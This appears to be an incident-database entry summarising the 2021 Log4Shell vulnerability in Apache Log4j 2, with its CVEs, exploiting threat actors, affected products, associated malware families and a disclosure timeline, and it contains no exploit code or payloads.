Other
CISA / Apache Software Foundation / CrowdStrike
Primary Source βIncident Details
Critical CVSS 10.0 RCE vulnerability in Apache Log4j 2 logging library. Publicly disclosed Dec 9 2021; patch released same day (2.15.0). Nation-state actors from China, Iran, North Korea, Russia exploited within days. Iranian APT used against US critical infrastructure (CISA/FBI). ~2M attacks/hour observed at peak by Akamai. Affected: VMware vCenter, Cisco, IBM WebSphere, Fortinet, AWS, Azure, GCP, Steam, Apple iCloud, Minecraft. UKG (Kronos) hit with ransomware. Mass exploitation began before most patches applied.
Technical Details
- Initial Attack Vector
- CWE-917: Improper Neutralization of Special Elements in Expression Language (JNDI injection in log4j)
- Vendor / Product
- Apache Log4j 2
- Software Package
log4j- Malware Family
- Conti (ransomware), various cryptominers, Orcus RAT
- CVE / GHSA References
- CVE-2021-44228 CVE-2021-45046 CVE-2021-45105
Timeline
- 2021-12-01 Breach occurred
- 2021-12-09 Publicly disclosed
- unknown Customers notified